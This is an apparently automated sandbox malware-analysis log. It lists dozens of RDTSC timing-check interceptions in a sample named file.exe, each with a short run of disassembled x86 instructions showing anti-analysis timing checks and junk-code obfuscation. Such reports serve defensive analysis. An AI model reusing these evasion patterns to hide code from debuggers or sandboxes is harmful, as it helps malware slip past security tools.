            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1968 second address: DC196F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC196F second address: DC1975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1975 second address: DC1979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC23B6 second address: DC23BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC23BA second address: DC23BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2CB2 second address: DC2CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2CB8 second address: DC2CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2CBC second address: DC2D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx edi, si 0x0000000e push 00000000h 0x00000010 jmp 00007FF9ACEA228Ah 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FF9ACEA2288h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov esi, dword ptr [ebp+122D231Eh] 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b ja 00007FF9ACEA2286h 0x00000041 pop eax 0x00000042 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5201 second address: DC5207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7675 second address: DC770F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF9ACEA2293h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+1245CDF0h], ebx 0x00000012 mov dword ptr [ebp+12466B76h], eax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FF9ACEA2288h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 push eax 0x00000035 xor edi, 1C614189h 0x0000003b pop edi 0x0000003c jmp 00007FF9ACEA2297h 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007FF9ACEA2288h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 0000001Ah 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d xchg eax, ebx 0x0000005e push esi 0x0000005f push eax 0x00000060 push edx 0x00000061 js 00007FF9ACEA2286h 0x00000067 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC964D second address: DC9690 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007FF9ACE9409Eh 0x00000010 jmp 00007FF9ACE9409Ah 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF9ACE9409Eh 0x0000001d jmp 00007FF9ACE9409Fh 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9690 second address: DC96BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2295h 0x00000007 jmp 00007FF9ACEA2296h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDE58 second address: DCDED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx ebx, cx 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 jmp 00007FF9ACE940A8h 0x00000017 mov ebx, dword ptr [ebp+122D36D3h] 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FF9ACE94098h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a push ebx 0x0000003b mov bx, A6FDh 0x0000003f pop ebx 0x00000040 sub dword ptr [ebp+122D26CFh], eax 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDED3 second address: DCDEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA2292h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEE3A second address: DCEE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE940A3h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEFEE second address: DCF003 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF9ACEA2288h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0E23 second address: DD0E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0075 second address: DD007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0E2C second address: DD0E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD007A second address: DD0080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0E30 second address: DD0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FF9ACE940A3h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FF9ACE94098h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov bh, 8Eh 0x0000002a push 00000000h 0x0000002c sbb bx, 11ACh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FF9ACE94098h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d xchg eax, esi 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 jmp 00007FF9ACE9409Bh 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FF9ACE940A6h 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0080 second address: DD0084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0EC8 second address: DD0EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0EE8 second address: DD0EF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF9ACEA2286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF31 second address: D8BF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF39 second address: D8BF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF3F second address: D8BF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF9ACE940A2h 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0FF4 second address: DD1010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA2297h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF61 second address: D8BF82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FF9ACE94096h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF82 second address: D8BF86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1010 second address: DD1016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1016 second address: DD101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD35CA second address: DD35E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF9ACE94098h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD54B5 second address: DD5557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc bx, 6756h 0x00000011 and edi, 0228A1EBh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FF9ACEA2288h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 movzx edi, cx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FF9ACEA2288h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 adc bx, 2EA6h 0x00000057 mov bl, 9Ah 0x00000059 xchg eax, esi 0x0000005a jmp 00007FF9ACEA2295h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FF9ACEA2291h 0x00000067 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD46F1 second address: DD46F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD64D0 second address: DD64EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD568D second address: DD5692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5692 second address: DD5698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5698 second address: DD569C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD84BE second address: DD84C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD84C2 second address: DD84D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF9ACE9409Ch 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD84D4 second address: DD84EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF9ACEA2286h 0x00000009 jno 00007FF9ACEA2286h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jnc 00007FF9ACEA2286h 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A3D9 second address: D8A3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FF9ACE94096h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A3E7 second address: D8A404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF9ACEA2295h 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8A8B second address: DD8A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACE9409Fh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8A9E second address: DD8B28 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF9ACEA2286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF9ACEA2296h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FF9ACEA2288h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push edx 0x0000002e or dword ptr [ebp+122D1840h], edi 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 or dword ptr [ebp+122D292Dh], esi 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007FF9ACEA2288h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D368Fh] 0x0000005f mov dword ptr [ebp+1249084Ch], eax 0x00000065 xchg eax, esi 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a pop eax 0x0000006b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8B28 second address: DD8B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8B40 second address: DD8B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF9ACEA2286h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d je 00007FF9ACEA2294h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8B57 second address: DD8B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6673 second address: DD6677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6677 second address: DD6680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6680 second address: DD66A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jg 00007FF9ACEA2286h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF9ACEA228Eh 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD66A4 second address: DD66A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD66A8 second address: DD6719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push esi 0x00000009 jmp 00007FF9ACEA228Bh 0x0000000e pop ebx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, dword ptr [ebp+122D1813h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 adc ebx, 4A4D5C27h 0x00000029 mov eax, dword ptr [ebp+122D0719h] 0x0000002f mov ebx, dword ptr [ebp+122D2724h] 0x00000035 push FFFFFFFFh 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FF9ACEA2288h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 adc edi, 73125B47h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b ja 00007FF9ACEA2286h 0x00000061 push edi 0x00000062 pop edi 0x00000063 popad 0x00000064 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD99CF second address: DD99D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8DBE second address: DD8DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9B7D second address: DD9BAA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF9ACE9409Ch 0x00000008 jnp 00007FF9ACE94096h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF9ACE940A9h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB9C8 second address: DDB9CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9BAA second address: DD9C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF9ACE9409Ah 0x0000000f pop eax 0x00000010 popad 0x00000011 nop 0x00000012 mov ebx, dword ptr [ebp+122D37C3h] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov dword ptr [ebp+1246513Bh], eax 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c or edi, dword ptr [ebp+122D28E7h] 0x00000032 mov eax, dword ptr [ebp+122D099Dh] 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007FF9ACE94098h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 add bx, E2D0h 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebx 0x0000005c call 00007FF9ACE94098h 0x00000061 pop ebx 0x00000062 mov dword ptr [esp+04h], ebx 0x00000066 add dword ptr [esp+04h], 00000018h 0x0000006e inc ebx 0x0000006f push ebx 0x00000070 ret 0x00000071 pop ebx 0x00000072 ret 0x00000073 jmp 00007FF9ACE940A6h 0x00000078 nop 0x00000079 jmp 00007FF9ACE9409Ah 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007FF9ACE940A4h 0x00000086 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9C68 second address: DD9C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACEA2299h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD9E2 second address: DDDA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF9ACE94098h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov di, E086h 0x0000002b push 00000000h 0x0000002d movsx ebx, cx 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FF9ACE9409Bh 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDA2A second address: DDDA30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDCAE1 second address: DDCAE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDA30 second address: DDDA35 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDA35 second address: DDDA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007FF9ACE94098h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FF9ACE9409Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDEA42 second address: DDEA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA228Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF9ACEA2299h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDEA6C second address: DDEB2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FF9ACE94098h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FF9ACE94098h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov edi, dword ptr [ebp+122D385Bh] 0x00000047 call 00007FF9ACE9409Ch 0x0000004c pop ebx 0x0000004d mov ebx, 1F679C15h 0x00000052 push 00000000h 0x00000054 pushad 0x00000055 mov bx, di 0x00000058 call 00007FF9ACE940A4h 0x0000005d and edx, 3C255B81h 0x00000063 pop esi 0x00000064 popad 0x00000065 push eax 0x00000066 pushad 0x00000067 jmp 00007FF9ACE940A9h 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007FF9ACE940A7h 0x00000073 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8055E second address: D80577 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FF9ACEA2291h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDED70 second address: DDED76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDED76 second address: DDED7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
